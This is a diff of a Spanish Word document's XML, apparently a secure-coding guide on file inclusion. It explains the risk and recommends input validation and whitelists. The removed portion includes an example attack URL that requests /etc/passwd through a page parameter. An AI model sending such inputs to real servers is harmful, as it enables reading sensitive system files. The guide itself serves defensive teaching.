+        </w:rPr>
+        <w:t xml:space="preserve">Ejemplo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">completo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>de Código Seguro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLconformatoprevio"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="435983A0" wp14:editId="7E665A43">
+            <wp:extent cx="5019675" cy="2601595"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="8255"/>
+            <wp:docPr id="896475280" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="896475280" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5019675" cy="2601595"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLconformatoprevio"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLconformatoprevio"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLconformatoprevio"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLconformatoprevio"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLconformatoprevio"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLconformatoprevio"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLconformatoprevio"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         <w:tabs>
           <w:tab w:val="left" w:pos="916"/>
           <w:tab w:val="left" w:pos="1832"/>
@@ -2558,1017 +3612,6 @@
           <w:tab w:val="left" w:pos="13740"/>
           <w:tab w:val="left" w:pos="14656"/>
         </w:tabs>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>http://example.com/index.php?page=/etc/passwd</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="708"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Si el código posteriormente incluye el archivo especificado en $file sin ninguna validación</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (listas blancas, etc)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, el atacante podría acceder a archivos sensibles del sistema</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, y si el código incluyera el comando </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Include=$file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">entonces el atacante no solo </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>podría</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> acceder y observar el contenido sensible, sino que podría ejecutar código malicioso</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Mitigación</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> del riesgo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Para mitigar </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">los efectos de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>esta vulnerabilidad, es crucial validar y sanitizar todas las entradas del usuario</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, con alguna/s de las siguientes recomendaciones:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Validar la</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ntrada</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">s, asegurando </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>que solo se puedan incluir archivos permitidos.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Ejemplo:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="708"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D163AC3" wp14:editId="7B5DF331">
-            <wp:extent cx="4982766" cy="1264258"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="134907625" name="Imagen 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="134907625" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5074160" cy="1287447"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Utilizar Listas Blancas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> que p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ermit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>an</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>únicamente</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> archivos específicos que sean seguros.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Ejemplo:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1416"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>$allowed_pages = array (“home”, “about”, “contact”);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
